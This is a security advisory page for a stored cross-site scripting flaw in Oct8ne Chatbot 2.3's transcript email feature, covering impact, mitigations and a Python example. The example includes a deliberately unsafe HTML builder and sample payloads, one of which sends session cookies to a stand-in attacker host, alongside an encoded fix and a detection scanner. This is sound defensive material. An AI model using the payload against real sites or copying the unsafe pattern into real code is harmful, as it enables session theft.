CVE-2025-11952: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Oct8ne Chatbot
Stored Cross-site Scripting (XSS) in Oct8ne Chatbot v2.3. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by injecting a malicious payload through the creation of a transcript that is sent by email. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user, through /Records/SendSummaryMail.
AI Analysis
Technical Summary
CVE-2025-11952 is a stored Cross-site Scripting (XSS) vulnerability classified under CWE-79, affecting Oct8ne Chatbot version 2.3. The flaw arises from improper neutralization of input during web page generation, specifically in the functionality that builds a chat transcript and sends it by email through the /Records/SendSummaryMail endpoint. An attacker can place JavaScript in the transcript content (for example in a chat message); that content is stored unencoded and later executes in the victim's browser when the transcript is rendered. This lets the attacker read sensitive information such as session cookies or perform actions on behalf of the user without their consent. Injection is possible over the network without authentication; triggering the payload requires a victim to open or render the malicious transcript. The CVSS 4.0 base score of 5.3 (medium) reflects exactly that split: network attack vector and low attack complexity, with no privileges or interaction needed to plant the payload, but user interaction needed before it fires. Practitioners should note that mainstream mail clients do not execute JavaScript in HTML messages, so in practice the payload fires wherever the stored transcript HTML is rendered by a browser; confirm in your own deployment where transcript records are viewed. The scope is limited to version 2.3 of Oct8ne Chatbot. No patch or fix is currently linked, and no exploitation in the wild has been reported. The vulnerability was assigned and published by INCIBE on October 22, 2025.
Potential Impact
For European organizations using Oct8ne Chatbot version 2.3, this vulnerability poses a real risk to the confidentiality and integrity of user data. Successful exploitation can lead to session hijacking, unauthorized actions performed with the victim's privileges, and data leakage, which in turn can mean compromised accounts, unauthorized access to sensitive business information, and reputational damage. Because the chatbot is typically integrated into customer support or internal communication workflows, exploitation could disrupt business operations or lead to GDPR obligations if personal data is exposed. The medium score indicates a moderate but tangible risk, highest in environments where staff routinely open chatbot transcripts. The absence of an authentication requirement for injection widens the attack surface, since any chat participant can plant a payload; the need for user interaction to trigger it limits how immediately the impact lands.
Mitigation Recommendations
1. Audit who can reach the /Records/SendSummaryMail endpoint and restrict it to trusted users where the product allows it.
2. Apply contextual output encoding (HTML entity encoding at the point the transcript is written into the mail body or page) to all participant-supplied data; input validation alone will not neutralize markup that is stored and rendered later.
3. Set Content Security Policy (CSP) headers on the web views that render transcripts to limit execution of unauthorized scripts. Note that CSP applies only to browser-rendered pages, not to mail clients.
4. Educate users to be cautious when opening chatbot transcript emails, especially those from unknown or unexpected sources.
5. Monitor outbound transcript emails for active content (script or iframe tags, on* event-handler attributes, javascript: URLs). Parse the HTML rather than relying on naive string matching, which will also flag correctly encoded text.
6. If no patch is available, consider disabling the transcript email functionality temporarily to prevent exploitation.
7. Work with Oct8ne vendor support to obtain or request a security patch addressing this vulnerability.
8. Conduct regular security assessments of chatbot integrations and email workflows to detect similar injection flaws.
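The rendering flaw described in the technical summary above, and the output-encoding and monitoring steps in mitigation items 2 and 5, as an added Python example. This is not Oct8ne's code: the transcript structure, function names and sample messages are constructed for illustration, and the unsafe builder only reproduces the CWE-79 pattern of concatenating participant-supplied text into an HTML mail body.

```python
"""Added example (not Oct8ne's code): a minimal transcript-to-HTML mail
builder in its unsafe and output-encoded forms, plus a parser-based check
for active content in a generated body. All names and data are constructed."""
import html
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List


@dataclass
class Message:
    sender: str  # display name chosen by the chat participant (untrusted)
    text: str    # message body typed by the chat participant (untrusted)


# Constructed sample transcript: the last two visitor messages carry payloads.
SAMPLE_TRANSCRIPT: List[Message] = [
    Message("Agent", "Hello, how can I help?"),
    Message("Visitor", "I can't log in & my order is stuck"),
    Message("Visitor", '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'),
    Message("Visitor", '<a href="JavaScript:alert(document.domain)">click</a>'),
]


def render_transcript_unsafe(messages: List[Message]) -> str:
    """Vulnerable pattern (CWE-79): untrusted text is concatenated straight
    into the HTML body, so markup inside a message becomes live markup."""
    rows = "".join(f"<li><b>{m.sender}</b>: {m.text}</li>" for m in messages)
    return f"<html><body><h1>Chat summary</h1><ul>{rows}</ul></body></html>"


def render_transcript_safe(messages: List[Message]) -> str:
    """Hardened pattern: every untrusted value is entity-encoded at the point
    it is written into element content. quote=True also escapes quotes so the
    same helper is safe if a value is later placed in an attribute."""
    rows = "".join(
        f"<li><b>{html.escape(m.sender, quote=True)}</b>: "
        f"{html.escape(m.text, quote=True)}</li>"
        for m in messages
    )
    return f"<html><body><h1>Chat summary</h1><ul>{rows}</ul></body></html>"


class ActiveContentScanner(HTMLParser):
    """Collects elements and attributes that can run script when rendered.
    Because it parses real markup, entity-encoded text in a message is seen
    as text, not as a tag, which is exactly what output encoding guarantees."""

    # Elements a plain-text transcript template never needs; tune per template.
    RISKY_TAGS = {"script", "iframe", "object", "embed", "svg", "math", "form", "base"}
    _SCRIPT_URL = re.compile(r"\s*javascript\s*:", re.IGNORECASE)

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in self.RISKY_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):            # onerror=, onload=, onclick=, ...
                self.findings.append(f"handler:{name}")
            if value and self._SCRIPT_URL.match(value):
                self.findings.append(f"url:{name}")  # href="javascript:..." etc.


def find_active_content(html_body: str) -> List[str]:
    """Return the list of script-capable fragments found in a generated body.
    An empty list means the parser saw no element or attribute that can
    execute script; use this as a monitoring signal, not as a sanitizer."""
    scanner = ActiveContentScanner()
    scanner.feed(html_body)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for label, body in (("unsafe", render_transcript_unsafe(SAMPLE_TRANSCRIPT)),
                        ("safe", render_transcript_safe(SAMPLE_TRANSCRIPT))):
        print(f"[{label}] findings={find_active_content(body)}")
        print(body, end="\n\n")
```

Run it as a script to print both bodies. The scanner parses the generated HTML instead of grepping it, which is the point for mitigation item 5: after html.escape the payload survives as visible text (`&lt;img src=x onerror=...`), so a substring search for `onerror=` would still flag the safe mail, while the parser sees no element and no attribute and reports nothing.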
Affected Countries
Germany, France, United Kingdom, Netherlands, Spain, Italy
Technical Details
- Data Version: 5.1
- Assigner Short Name: INCIBE
- Date Reserved: 2025-10-20T09:19:23.658Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 68f897b2d59611fbd9697956
Added to database: 10/22/2025, 8:37:06 AM
Last enriched: 10/29/2025, 9:00:34 AM
Last updated: 2/7/2026, 9:04:06 AM